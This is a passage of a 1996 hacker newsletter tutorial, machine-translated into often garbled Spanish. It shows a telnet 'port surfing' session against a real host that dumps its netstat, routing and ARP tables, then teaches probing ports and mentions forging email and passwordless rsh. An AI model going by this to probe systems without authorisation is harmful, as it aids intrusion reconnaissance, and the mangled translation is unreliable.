TCP 0 0 * (TELNET) * (*) ESCUCHAR TCP 0 0 * (FTP) * (*) ESCUCHAR TCP 0 0 * (DEDO) * (*) ESCUCHAR TCP 0 0 * (NETSTAT) * (*) ESCUCHAR TCP 0 0 * (SMTP) * (*) ESCUCHAR TCP 0 0 * (Entrar) * (*) ESCUCHAR TCP 0 0 * (SHELL) * (*) ESCUCHAR TCP 0 0 * (EXEC) * (*) ESCUCHAR TCP 0 0 * (RPC) * (*) ESCUCHAR TCP 0 0 * (NetControl) * (*) ESCUCHAR TCP 0 0 * (SYSTAT) * (*) ESCUCHAR TCP 0 0 * (CHARGEN) * (*) ESCUCHAR TCP 0 0 * (durante el día) * (*) ESCUCHAR TCP 0 0 * (TIME) * (*) ESCUCHE TCP 0 0 * (ECHO) * (*) ESCUCHAR TCP 0 0 * (DESCARTAR) * (*) ESCUCHAR TCP 0 0 * (IMPRESORA) * (*) ESCUCHAR TCP 0 0 * (POP2) * (*) ESCUCHAR TCP 0 0 * (POP3) * (*) ESCUCHAR TCP 0 0 * (KERBEROS_MASTER) * (*) ESCUCHAR TCP 0 0 * (klogin) * (*) ESCUCHAR TCP 0 0 * (kshell) * (*) ESCUCHAR TCP 0 0 GRANDE.NM.ORG (4174) OSO.NM.ORG (X11) ESTABLECIDO TCP 0 0 GRANDE.NM.ORG (4172) OSO.NM.ORG (X11) ESTABLECIDO TCP 0 0 GRANDE.NM.ORG (4171) OSO.NM.ORG (X11) ESTABLECIDO TCP 0 0 * (FS) * (*) ESCUCHE UDP 0 0 * (NameService) * (*) UDP 0 0 127.0.0.1 (NameService) * (*) UDP 0 0 GRANDE.NM.OR (NAMESERV) * (*) UDP 0 0 * (TFTP) * (*) UDP 0 0 * (bootps) * (*) UDP 0 0 * (Kerberos) * (*) UDP 0 0 127.0.0.1 (Kerberos) * (*) UDP 0 0 GRANDE.NM.OR (Kerberos) * (*) UDP 0 0 * (*) * (*) UDP 0 0 * (SNMP) * (*) UDP 0 0 * (RPC) * (*) UDP 0 0 * (durante el día) * (*) UDP 0 0 * (ECHO) * (*) UDP 0 0 * (DESCARTAR) * (*) UDP 0 0 * (TIME) * (*) UDP 0 0 * (CHARGEN) * (*) UDP 0 0 * (hablar) * (*) UDP 0 0 * (ntalk) * (*) UDP 0 0 * (1023) * (*) UDP 0 0 * (XDMCP) * (*) MultiNet registrado programas RPC: Versión Programa Portuario Protocolo ------- ------- -------- ---Portmap 2 TCP 111
Portmap 2 UDP 111 Mesas MultiNet IP Routing: Destino Banderas de Gateway refcnt Uso Interface MTU ---------- ---------- ----- ------ ----- --------- ---198.59.167.1 LAWRII.NM.ORG arriba, Gateway, H 0 2 SE0 1500 166.45.0.1 ENSS365.NM.ORG arriba, Gateway, H 0 4162 SE0 1500 205.138.138.1 ENSS365.NM.ORG arriba, Gateway, H 0 71 SE0 1500 204.127.160.1 ENSS365.NM.ORG arriba, Gateway, H 0 298 SE0 1500 127.0.0.1 127.0.0.1 para arriba, Host 5 1183513 lo0 4136 198.59.167.2 LAWRII.NM.ORG arriba, Gateway, H 0 640 SE0 1500 192.132.89.2 ENSS365.NM.ORG arriba, Gateway, H 0 729 SE0 1500 207.77.56.2 ENSS365.NM.ORG arriba, Gateway, H 0 5 SE0 1500 204.97.213.2 ENSS365.NM.ORG arriba, Gateway, H 0 2641 SE0 1500 194.90.74.66 ENSS365.NM.ORG arriba, Gateway, H 0 1 SE0 1500 204.252.102.2 ENSS365.NM.ORG arriba, Gateway, H 0 109 SE0 1500 205.160.243.2 ENSS365.NM.ORG arriba, Gateway, H 0 78 SE0 1500 202.213.4.2 ENSS365.NM.ORG arriba, Gateway, H 0 4 SE0 1500 202.216.224.66 ENSS365.NM.ORG arriba, Gateway, H 0 113 SE0 1500 192.132.89.3 ENSS365.NM.ORG arriba, Gateway, H 0 1100 SE0 1500 198.203.196.67 ENSS365.NM.ORG arriba, Gateway, H 0 385 SE0 1500 160.205.13.3 ENSS365.NM.ORG arriba, Gateway, H 0 78 SE0 1500 202.247.107.131 ENSS365.NM.ORG arriba, Gateway, H 0 19 SE0 1500 198.59.167.4 LAWRII.NM.ORG arriba, Gateway, H 0 82 SE0 1500 128.148.157.6 ENSS365.NM.ORG arriba, Gateway, H 0 198 SE0 1500 160.45.10.6 ENSS365.NM.ORG arriba, Gateway, H 0 3 SE0 1500 128.121.50.7 ENSS365.NM.ORG arriba, Gateway, H 0 3052 SE0 1500 206.170.113.8 ENSS365.NM.ORG arriba, Gateway, H 0 1451 SE0 1500 128.148.128.9 ENSS365.NM.ORG arriba, Gateway, H 0 1122 SE0 1500 203.7.132.9 ENSS365.NM.ORG arriba, Gateway, H 0 14 SE0 1500 204.216.57.10 ENSS365.NM.ORG arriba, Gateway, H 0 180 SE0 1500 130.74.1.75 ENSS365.NM.ORG arriba, Gateway, H 0 10117 SE0 1500 206.68.65.15 ENSS365.NM.ORG arriba, Gateway, H 0 249 SE0 1500 129.219.13.81 ENSS365.NM.ORG arriba, Gateway, H 0 547 SE0 1500 204.255.246.18 ENSS365.NM.ORG arriba, Gateway, H 0 1125 SE0 1500 160.45.24.21 ENSS365.NM.ORG arriba, Gateway, H 0 97 SE0 1500 206.28.168.21 ENSS365.NM.ORG arriba, Gateway, H 0 2093 SE0 1500 163.179.3.222 ENSS365.NM.ORG arriba, Gateway, H 0 315 SE0 1500 198.109.130.33 ENSS365.NM.ORG arriba, Gateway, H 0 1.825 SE0 1500 199.224.108.33 ENSS365.NM.ORG arriba, Gateway, H 0 11362 SE0 1500 203.7.132.98 ENSS365.NM.ORG arriba, Gateway, H 0 73 SE0 1500 198.111.253.35 ENSS365.NM.ORG arriba, Gateway, H 0 1134 SE0 1500 206.149.24.100 ENSS365.NM.ORG arriba, Gateway, H 0 3397 SE0 1500 165.212.105.106 ENSS365.NM.ORG arriba, Gateway, H 0 17 SE0 1006 205.238.3.241 ENSS365.NM.ORG arriba, Gateway, H 0 69 SE0 1500 198.49.44.242 ENSS365.NM.ORG arriba, Gateway, H 0 25 SE0 1500 194.22.188.242 ENSS365.NM.ORG arriba, Gateway, H 0 20 SE0 1500 164.64.0 LAWRII.NM.ORG arriba, puerta de enlace 1 40377 SE0 1500 0.0.0 ENSS365.NM.ORG arriba, Gateway 2 4728741 SE0 1500 207.66.1 GLORY.NM.ORG arriba, puerta de enlace 0 51 SE0 1500 205.166.1 GLORY.NM.ORG arriba, puerta de enlace 0 1978 SE0 1500
204.134.1 LAWRII.NM.ORG arriba, puerta de enlace 0 54 SE0 1500 204.134.2 GLORY.NM.ORG arriba, puerta de enlace 0 138 SE0 1500 192.132.2 129.121.248.1 para arriba, puerta de enlace 0 6345 SE0 1500 204.134.67 GLORY.NM.ORG arriba, puerta de enlace 0 2022 SE0 1500 206.206.67 GLORY.NM.ORG arriba, puerta de enlace 0 7778 SE0 1500 206.206.68 LAWRII.NM.ORG arriba, puerta de enlace 0 3185 SE0 1500 207.66.5 GLORY.NM.ORG arriba, puerta de enlace 0 626 SE0 1500 204.134.69 GLORY.NM.ORG arriba, puerta de enlace 0 7990 SE0 1500 207.66.6 GLORY.NM.ORG arriba, puerta de enlace 0 53 SE0 1500 204.134.70 LAWRII.NM.ORG arriba, puerta de enlace 0 18011 SE0 1500 192.188.135 GLORY.NM.ORG arriba, puerta de enlace 0 5 SE0 1500 206.206.71 LAWRII.NM.ORG arriba, puerta de enlace 0 2 SE0 1500 204.134.7 GLORY.NM.ORG arriba, puerta de enlace 0 38 SE0 1500 199.89.135 GLORY.NM.ORG arriba, puerta de enlace 0 99 SE0 1500 198.59.136 LAWRII.NM.ORG arriba, puerta de enlace 0 1293 SE0 1500 204.134.9 GLORY.NM.ORG arriba, puerta de enlace 0 21 SE0 1500 204.134.73 GLORY.NM.ORG arriba, puerta de enlace 0 59794 SE0 1500 129.138.0 GLORY.NM.ORG arriba, puerta de enlace 0 5262 SE0 1500 192.92.10 LAWRII.NM.ORG arriba, puerta de enlace 0 163 SE0 1500 206.206.75 LAWRII.NM.ORG arriba, puerta de enlace 0 604 SE0 1500 207.66.13 GLORY.NM.ORG arriba, puerta de enlace 0 1184 SE0 1500 204.134.77 LAWRII.NM.ORG arriba, puerta de enlace 0 3649 SE0 1500 207.66.14 GLORY.NM.ORG arriba, puerta de enlace 0 334 SE0 1500 204.134.78 GLORY.NM.ORG arriba, puerta de enlace 0 239 SE0 1500 204.52.207 GLORY.NM.ORG arriba, puerta de enlace 0 293 SE0 1500 204.134.79 GLORY.NM.ORG arriba, puerta de enlace 0 1294 SE0 1500 192.160.144 LAWRII.NM.ORG arriba, puerta de enlace 0 117 SE0 1500 206.206.80 PENNY.NM.ORG arriba, puerta de enlace 0 4663 SE0 1500 204.134.80 GLORY.NM.ORG arriba, puerta de enlace 0 91 SE0 1500 198.99.209 LAWRII.NM.ORG arriba, puerta de enlace 0 1136 SE0 1500 207.66.17 GLORY.NM.ORG arriba, puerta de enlace 0 24173 SE0 1500 204.134.82 GLORY.NM.ORG arriba, puerta de enlace 0 29766 SE0 1500 192.41.211 GLORY.NM.ORG arriba, puerta de enlace 0 155 SE0 1500 192.189.147 LAWRII.NM.ORG arriba, puerta de enlace 0 3133 SE0 1500 204.134.84 PENNY.NM.ORG arriba, puerta de enlace 0 189 SE0 1500 204.134.87 LAWRII.NM.ORG arriba, puerta de enlace 0 94 SE0 1500 146.88.0 GLORY.NM.ORG arriba, puerta de enlace 0 140 SE0 1500 192.84.24 GLORY.NM.ORG arriba, puerta de enlace 0 3530 SE0 1500 204.134.88 LAWRII.NM.ORG arriba, puerta de enlace 0 136 SE0 1500 198.49.217 GLORY.NM.ORG arriba, puerta de enlace 0 303 SE0 1500 192.132.89 GLORY.NM.ORG arriba, puerta de enlace 0 3513 SE0 1500 198.176.219 GLORY.NM.ORG arriba, puerta de enlace 0 1278 SE0 1500 206.206.92 LAWRII.NM.ORG arriba, puerta de enlace 0 1228 SE0 1500 192.234.220 129.121.1.91 para arriba, puerta de enlace 0 2337 SE0 1500 204.134.92 LAWRII.NM.ORG arriba, puerta de enlace 0 13995 SE0 1500 198.59.157 LAWRII.NM.ORG arriba, puerta de enlace 0 508 SE0 1500 206.206.93 GLORY.NM.ORG arriba, puerta de enlace 0 635 SE0 1500 204.134.93 GLORY.NM.ORG arriba, puerta de enlace 0 907 SE0 1500 198.59.158 LAWRII.NM.ORG arriba, puerta de enlace 0 14214 SE0 1500 198.59.159 LAWRII.NM.ORG arriba, puerta de enlace 0 1806 SE0 1500
204.134.95 PENNY.NM.ORG arriba, puerta de enlace 0 3644 SE0 1500 206.206.96 GLORY.NM.ORG arriba, puerta de enlace 0 990 SE0 1500 206.206.161 LAWRII.NM.ORG arriba, puerta de enlace 0 528 SE0 1500 198.59.97 PENNY.NM.ORG arriba, puerta de enlace 0 55 SE0 1500 198.59.161 LAWRII.NM.ORG arriba, puerta de enlace 0 497 SE0 1500 192.207.226 GLORY.NM.ORG arriba, puerta de enlace 0 93217 SE0 1500 198.59.99 PENNY.NM.ORG arriba, puerta de enlace 0 2 SE0 1500 198.59.163 GLORY.NM.ORG arriba, puerta de enlace 0 3379 SE0 1500 192.133.100 LAWRII.NM.ORG arriba, puerta de enlace 0 3649 SE0 1500 204.134.100 GLORY.NM.ORG arriba, puerta de enlace 0 8 SE0 1500 128.165.0 PENNY.NM.ORG arriba, puerta de enlace 0 15851 SE0 1500 198.59.165 GLORY.NM.ORG arriba, puerta de enlace 0 274 SE0 1500 206.206.165 LAWRII.NM.ORG arriba, puerta de enlace 0 167 SE0 1500 206.206.102 GLORY.NM.ORG arriba, puerta de enlace 0 5316 SE0 1500 160.230.0 LAWRII.NM.ORG arriba, puerta de enlace 0 19408 SE0 1500 206.206.166 LAWRII.NM.ORG arriba, puerta de enlace 0 1756 SE0 1500 205.166.231 GLORY.NM.ORG arriba, puerta de enlace 0 324 SE0 1500 198.59.167 GLORY.NM.ORG arriba, puerta de enlace 0 1568 SE0 1500 206.206.103 GLORY.NM.ORG arriba, puerta de enlace 0 3629 SE0 1500 198.59.168 GLORY.NM.ORG arriba, puerta de enlace 0 9063 SE0 1500 206.206.104 GLORY.NM.ORG arriba, puerta de enlace 0 7333 SE0 1500 206.206.168 GLORY.NM.ORG arriba, puerta de enlace 0 234 SE0 1500 204.134.105 LAWRII.NM.ORG arriba, puerta de enlace 0 4826 SE0 1500 206.206.105 LAWRII.NM.ORG arriba, puerta de enlace 0 422 SE0 1500 204.134.41 LAWRII.NM.ORG arriba, puerta de enlace 0 41782 SE0 1500 206.206.169 GLORY.NM.ORG arriba, puerta de enlace 0 5101 SE0 1500 204.134.42 GLORY.NM.ORG arriba, puerta de enlace 0 10.761 SE0 1500 206.206.170 GLORY.NM.ORG arriba, puerta de enlace 0 916 SE0 1500 198.49.44 GLORY.NM.ORG arriba, puerta de enlace 0 3 SE0 1500 198.59.108 GLORY.NM.ORG arriba, puerta de enlace 0 2129 SE0 1500 204.29.236 GLORY.NM.ORG arriba, puerta de enlace 0 125 SE0 1500 206.206.172 GLORY.NM.ORG arriba, puerta de enlace 0 5839 SE0 1500 204.134.108 GLORY.NM.ORG arriba, puerta de enlace 0 3216 SE0 1500 206.206.173 GLORY.NM.ORG arriba, puerta de enlace 0 374 SE0 1500 198.175.173 LAWRII.NM.ORG arriba, puerta de enlace 0 6227 SE0 1500 198.59.110 GLORY.NM.ORG arriba, puerta de enlace 0 1797 SE0 1500 198.51.238 GLORY.NM.ORG arriba, puerta de enlace 0 1356 SE0 1500 192.136.110 GLORY.NM.ORG arriba, puerta de enlace 0 583 SE0 1500 204.134.48 GLORY.NM.ORG arriba, puerta de enlace 0 42 SE0 1500 198.175.176 LAWRII.NM.ORG arriba, puerta de enlace 0 32 SE0 1500 206.206.114 LAWRII.NM.ORG arriba, puerta de enlace 0 44 SE0 1500 206.206.179 LAWRII.NM.ORG arriba, puerta de enlace 0 14 SE0 1500 198.59.179 PENNY.NM.ORG arriba, puerta de enlace 0 222 SE0 1500 198.59.115 GLORY.NM.ORG arriba, puerta de enlace 1 132 886 1500 SE0 206.206.181 GLORY.NM.ORG arriba, puerta de enlace 0 1354 SE0 1500 206.206.182 SIENNA.NM.ORG arriba, puerta de enlace 0 16 SE0 1500 206.206.118 GLORY.NM.ORG arriba, puerta de enlace 0 3423 SE0 1500 206.206.119 GLORY.NM.ORG arriba, puerta de enlace 0 282 SE0 1500 206.206.183 SIENNA.NM.ORG arriba, puerta de enlace 0 2473 SE0 1500 143.120.0 LAWRII.NM.ORG arriba, puerta de enlace 0 123533 SE0 1500
206.206.184 GLORY.NM.ORG arriba, puerta de enlace 0 1114 SE0 1500 205.167.120 GLORY.NM.ORG arriba, puerta de enlace 0 4202 SE0 1500 206.206.121 GLORY.NM.ORG arriba, puerta de enlace 1 71 SE0 1500 129.121.0 GRANDE.NM.ORG Hasta 12 21658599 SE0 1500 204.134.122 GLORY.NM.ORG arriba, puerta de enlace 0 195 SE0 1500 204.134.58 GLORY.NM.ORG arriba, puerta de enlace 0 7707 SE0 1500 128.123.0 GLORY.NM.ORG arriba, puerta de enlace 0 34416 SE0 1500 204.134.59 GLORY.NM.ORG arriba, puerta de enlace 0 1007 SE0 1500 204.134.124 GLORY.NM.ORG arriba, puerta de enlace 0 37160 SE0 1500 206.206.124 LAWRII.NM.ORG arriba, puerta de enlace 0 79 SE0 1500 206.206.125 PENNY.NM.ORG arriba, puerta de enlace 0 233359 SE0 1500 204.134.126 GLORY.NM.ORG arriba, puerta de enlace 0 497 SE0 1500 206.206.126 LAWRII.NM.ORG arriba, puerta de enlace 0 13644 SE0 1500 204.69.190 GLORY.NM.ORG arriba, puerta de enlace 0 4059 SE0 1500 206.206.190 GLORY.NM.ORG arriba, puerta de enlace 0 1630 SE0 1500 204.134.127 GLORY.NM.ORG arriba, puerta de enlace 0 45621 SE0 1500 206.206.191 GLORY.NM.ORG arriba, puerta de enlace 0 3574 SE0 1500 Mesas MultiNet IPX Routing: Destino Banderas de Gateway refcnt Uso Interface MTU ---------- ---------- ----- ------ ----- --------- ---Mesa MultiNet ARP: Anfitrión de direcciones de red Ethernet Dirección Banderas Arp -------------------------------------------- ------ ---------- --------GLORY.NM.ORG (IP 129.121.1.4) AA: 00: 04: 00: 61: D0 Temporal [Unknown] (IP 129.121.251.1) 00: C0: 05: 01: 2C: D2 Temporal NARANJO.NM.ORG (IP 129.121.1.56) 08: 00: 87: 04: 9F: 42 Temporal CHAMA.NM.ORG (IP 129.121.1.8) AA: 00: 04: 00: 0C: D0 Temporal [Unknown] (IP 129.121.251.5) AA: 00: 04: 00: D2: D0 Temporal LAWRII.NM.ORG (IP 129.121.254.10) AA: 00: 04: 00: 5C: D0 Temporal [Unknown] (IP 129.121.1.91) 00: C0: 05: 01: 2C: D2 Temporal BRAVO.NM.ORG (IP 129.121.1.6) AA: 00: 04: 00: 0B: D0 Temporal PENNY.NM.ORG (IP 129.121.1.10) AA: 00: 04: 00: 5F: D0 Temporal ARRIBA.NM.ORG (IP 129.121.1.14) 08: 00: 2B: BC: C1: A7 temporal AZUL.NM.ORG (IP 129.121.1.51) 08: 00: 87: 00: A1: D3 Temporal ENSS365.NM.ORG (IP 129.121.1.3) 00: 00: 0C: 51: EF: 58 Temporal AVATAR.NM.ORG (IP 129.121.254.1) 08: 00: 5A: 1D: 52: 0D Temporal [Unknown] (IP 129.121.253.2) 08: 00: 5A: 47: 4A: 1D Temporal [Unknown] (IP 129.121.254.5) 00: C0: 7B: 5F: 5F: 80 Temporal CONCHAS.NM.ORG (IP 129.121.1.11) 08: 00: 5A: 47: 4A: 1D Temporal [Unknown] (IP 129.121.253.10) AA: 00: 04: 00: 4B: D0 Temporal Estadísticas de interfaz de red MultiNet: Nombre Mtu dirección de red Ipkts Ierrs Opkts Oerrs Collis ---- --- ------- -------------- ----- ----- ----- ----- - ---SE0 1500 129.121.0 GRANDE.NM.ORG 68.422.948 0 53.492.833 1 0 lo0 4136 127.0.0.1 127.0.0 1188191 0 1188191 0 0 Estadísticas Protocolo MultiNet: Los paquetes IP recibidos 65264173 22 IP paquetes más pequeños que el tamaño mínimo 6928 fragmentos IP recibidos 4 fragmentos IP timed out
34 IP recibido destinos inalcanzables 704140 paquetes de error ICMP generados 9667 ICMP códigos de operación fuera de rango 4170 Mala ICMP sumas de control de paquetes 734363 respuestas ICMP 734363 ICMP paquetes "Echo" recibidos 734363 ICMP paquetes "Echo Reply" enviados 18339 ICMP paquetes "Echo Reply" recibidos 704140 ICMP "destino inalcanzable" paquetes enviados 451243 ICMP "destino inalcanzable" paquetes recibidos 1488 ICMP paquetes "Fuente Quench" recibidos 163911 ICMP paquetes "redirigir" recibidos 189732 ICMP "Tiempo" Superó paquetes recibidos 126966 conexiones TCP iniciada 233998 conexiones TCP establecida 132611 conexiones TCP aceptadas 67972 conexiones TCP cayeron 28182 conexiones TCP embrionarias cayeron 269399 conexiones TCP cerradas 10711838 segmentos TCP programado para RTT 10505140 segmentos TCP actualizan RTT 3927264 TCP retrasado ACKs enviados 666 conexiones TCP cayeron debido a retransmitir los tiempos de espera 111040 tiempos de espera de retransmisión TCP 3136 TCP persisten los tiempos de espera 9 TCP persisten gotas de conexión 16850 TCP tiempos de espera de keepalive 1195 sondas keepalive TCP enviados 14392 conexiones TCP cayeron debido a los tiempos de espera KEEPALIVE 28842663 paquetes TCP enviados 12714484 paquetes de datos TCP enviados 1206060086 bytes de datos TCP enviados 58321 paquetes de datos TCP retransmitido 22144036 bytes de datos TCP retransmitidas 6802199 TCP ACK-sólo los paquetes enviados 1502 sondas de ventana TCP enviados 483 TCP URG-sólo los paquetes enviados 8906175 TCP paquetes sólo Ventana-update-enviados 359509 paquetes de control TCP enviados 38675084 paquetes TCP recibidos 28399363 paquetes TCP recibidos en secuencia 1929418386 bytes TCP recibidos en secuencia 25207 paquetes TCP con errores de suma de comprobación 273374 paquetes TCP eran duplicados 230525708 bytes TCP eran duplicados 3748 paquetes TCP tenían algunos bytes duplicados 493214 bytes TCP eran duplicados parciales 2317156 paquetes TCP estaban fuera de servicio 3151204672 bytes TCP estaban fuera de servicio 1915 paquetes TCP tenían datos después de la ventana
865443 bytes TCP buscaban ventana 5804 paquetes TCP para conexión ya cerrado 941 paquetes TCP eran sondas ventana 10847459 paquetes TCP ACK tenían 222657 paquetes TCP tenían ACKs duplicados 1 paquete TCP ACKed datos sin enviar 1200274739 bytes TCP acked 141545 paquetes TCP tenían actualizaciones ventana 13 segmentos TCP cayeron debido a PAWS 4658158 segmentos TCP se predijo pura-ACK 24033756 segmentos TCP se predijo-data pura 8087980 TCP fallos de caché PCB 305 Bad sumas de comprobación de cabecera UDP 17 campos de longitud de datos Bad UDP 23772272 UDP PCB fallos de caché MultiNet Estadísticas Buffer: 388 de 608 amortiguadores en uso: 30 buffers asignados a datos. 10 buffers de paquetes asignados a las cabeceras. 66 buffers asignados a Estructuras socket. 57 buffers asignados al Protocolo de Control Blocks. 163 buffers asignados a entradas de la tabla de enrutamiento. 2 buffers asignados a Socket nombres y direcciones. 48 buffers asignados al Kernel Fork-Procesos. 2 buffers asignados a Interface Direcciones. 1 búfer asignado a las direcciones de multidifusión. 1 búfer asignado al tiempo de espera rellamadas. 6 buffers asignados a la gestión de memoria. 2 buffers asignados a la Red de TTY bloques de control. 11 de los 43 grupos de páginas en uso. 11 CXBs tomados de los controladores de dispositivos VMS 2 CXBs esperando para volver a los controladores de dispositivo VMS 162 Kbytes asignados a buffers MultiNet (44% en uso). 226 Kbytes de espacio de direcciones búfer asignado (0% del máximo). Conexion cerrada por anfitrion desconocido. [68] -> Whoa! ¿Qué fue todo eso? Lo que hicimos fue telnet al puerto 15 - el puerto: netstat que en algunos equipos se ejecuta un demonio que le dice a alguien que le importa a caer en casi todo lo relacionado con la conexión hecha por todos los ordenadores conectados a Internet a través de este equipo. Así que desde este aprendimos dos cosas: 1) Grande.nm.org es un equipo muy ocupado e importante. 2) Incluso un equipo muy ocupado e importante puede dejar que el surfista puerto aleatorio ven a jugar. Así que mi amiga quería probar otro puerto. Sugerí el puerto dedo, número 79. Así que se dio la orden: [68] -> telnet grande.nm.org 79 Tratando 129.121.1.2 ... Conectado a grande.nm.org.
Carácter de escape es '^]'. dedo ? Lo sentimos, no pudo encontrar "DEDO" Conexion cerrada por anfitrion desconocido. [69] -> telnet grande.nm.org 79 Tratando 129.121.1.2 ... Conectado a grande.nm.org. Carácter de escape es '^]'. Ayuda ? Lo sentimos, no pudo encontrar "AYUDA" Conexion cerrada por anfitrion desconocido. [69] -> telnet grande.nm.org 79 Tratando 129.121.1.2 ... Conectado a grande.nm.org. Carácter de escape es '^]'. ? ? Lo sentimos, no pudo encontrar "?" Conexion cerrada por anfitrion desconocido. [69] -> telnet grande.nm.org 79 Tratando 129.121.1.2 ... Conectado a grande.nm.org. Carácter de escape es '^]'. hombre ? Lo sentimos, no pudo encontrar "MAN" Conexion cerrada por anfitrion desconocido. [69] -> Al principio esto parece sólo un montón de comandos fallidos. Pero en realidad esto es bastante fascinante. La razón es que el puerto 79 es, según las normas IETF, que se supone para funcionar fingerd, el demonio dedo. Así que el comando "dedo" y grande.nm.org cuando dio dijo? Lo sentimos, pero no pudo encontrar "DEDO", sabíamos que este puerto no estaba siguiendo normas IETF. Ahora en los ordenadores Que ellos no corren el demonio dedo en absoluto. Esto se debe a que el dedo tiene propiedades por lo que pueden ser utilizados para obtener el control total del equipo que dirige. Pero si el dedo se cierra, y nada más se está ejecutando en el puerto 79, que woudl obtenemos la respuesta: telnet: connect: Connection refused. Pero en lugar de que nos conectamos y grande.nm.org estaba esperando un comando. Ahora lo normal un surfista puerto hace cuando se ejecuta un daemon unfmiliar es de convencer en revelar lo que los comandos que utiliza. "Ayuda", "?" Y "hombre" a menudo funciona. Pero no nos ayudó. Pero a pesar de estos comandos no nos ayudan, nos dijeron que el demonio es probablemente algo sensible. Si fuera un demonio que era para nadie y su hermano de usar, que nos habría dado instrucciones. Entonces, ¿qué hacemos ahora? Decidimos ser buenos ciudadanos de Internet y permanecer fuera de la cárcel Decidimos que íbamos beter cerrar sesión. Pero había un truco que decidimos hacer primero: dejar nuestra marca en el archivo de registro de la cáscara.
El archivo de registro de shell mantiene un registro de todos los comandos del sistema operativo hechas en un ordenador. El adminsitrator de un equipo obviamente importante como grande.nm.org es probablemente lo suficientemente competente para examinar los registros de lo que los comandos se dan por quién a su ordenador.Especialmente en un puerto tan importante como para estar ejecutando un misterio, el demonio no IETF. Así que todo lo que los tipos mientras conectados se guardan en un registro. Así que mi amigo se rió con alegría y dejó algunos mensajes en el puerto 79 antes de cerrar la sesión. Oh, querida, creo que está enganchado a la piratería. Hmmm, podría ser una buena manera de conocer a los administradores de sistemas lindos ... Así, resaca para arriba el puerto! Si quieres navegar, esto es lo básico: 1) Obtener iniciado sesión en una cuenta shell. Eso es una cuenta con su proveedor de Internet que le permite dar órdenes Unix. O - ejecutar Linux o algún otro tipo de Unix en su PC y conectarse a Internet. 2) Dar el "telnet " comando, donde es la dirección de Internet de la computadora que wnat para visitar y es lo ve phun a usted. 3) Si usted recibe la respuesta "conectado a ", luego hacia arriba de surf! Los siguientes son algunos de mis puertos favoritos. Es legal e inofensivo para pagar los visita, siempre y cuando usted no encontrar la manera de obtener la condición de superusuario mientras jugaba con ellos. Sin embargo, tenga en cuenta que si lo hace demasiado surf puerto desde su cuenta de concha, su administrador de sistemas puede notar esto en su archivo de registro de la cáscara. Si él o ella tiene prejuicios contra la piratería informática, usted puede conseguir inició su ISP. Así que es posible que desee para explicar de antemano que son simplemente un hacker aspecto inofensivo para pasar un buen rato, eh, eh, aprender sobre Unix. Yeh, que suena bien ... Servicio Número de puerto Por qué es Phun! 7 eco Lo que se teclea en, el anfitrión se repite de nuevo a usted, que se utiliza para el ping 9 deseche Dev / null - qué tan rápido puede usted imaginar esto? 11 Lotes SYSTAT de información sobre los usuarios 13 Tiempo durante el día y la fecha en la ubicación del equipo 15 info netstat Tremendo en las redes, pero rara vez se utiliza más 19 chargen derrama una corriente de caracteres ASCII. Utilice ^ C para detener. 21 Transfiere archivos ftp 22 ssh shell seguro de inicio de sesión - túnel cifrado 23 telnet Dónde conectarte si no utiliza ssh :) 25 smpt Forge correo electrónico de
[email protected]. Tiempo: 37 veces Ubicación de recursos de 39 rlp 43 Info whois en hosts y redes Servidor de nombres de dominio 53 70 Gopher fuera de la fecha de información cazador 79 dedos Un montón de información sobre los usuarios Servidor Web http 80 110 pop de correo electrónico entrante 119 NNTP grupos de noticias de Usenet - forjan mensajes, cancela
443 SHTTP Otro servidor web 512 notificación de correo biff 513 rlogin acceso remoto quien a distancia y tiempo de actividad que 514 comando remoto cáscara, utiliza ninguna contraseña! syslog registro del sistema remoto - cómo busto hackers 520 ruta protocolo de información de enrutamiento ************************** Punta de la cabeza hélice: Tenga en cuenta que en la mayoría de los casos un host de Internet usará estas asignaciones de número de puerto para estos servicios. Más de un servicio también se le puede asignar simultáneamente al mismo puerto. Este sistema de numeración se ofrece voluntariamente por el Internet Engineering Task Force (IETF). Eso significa que un host de Internet puede utilizar otros puertos para estos servicios. ¡Esperar lo inesperado! Si usted tiene una copia de Linux, puede obtener la lista de todas las asignaciones de IETF de números de puerto en el archivo / etc / services. ******************************** _________________________________________________________ Para suscribirse a la lista Happy Hacker, correo electrónico
[email protected] con messge "subscribe hh." Envíame correo electrónico confidencial (por favor, no hay discusión de actividades ilegales) utilizan
[email protected]. Por favor, llamas directas a dev/
[email protected]. Piratería feliz! Derechos reservados 1996 Carolyn P. Meinel. Usted puede enviar la GUÍA PARA (casi) Inofensivo HACKING, siempre y cuando salga de este aviso al final .. ________________________________________________________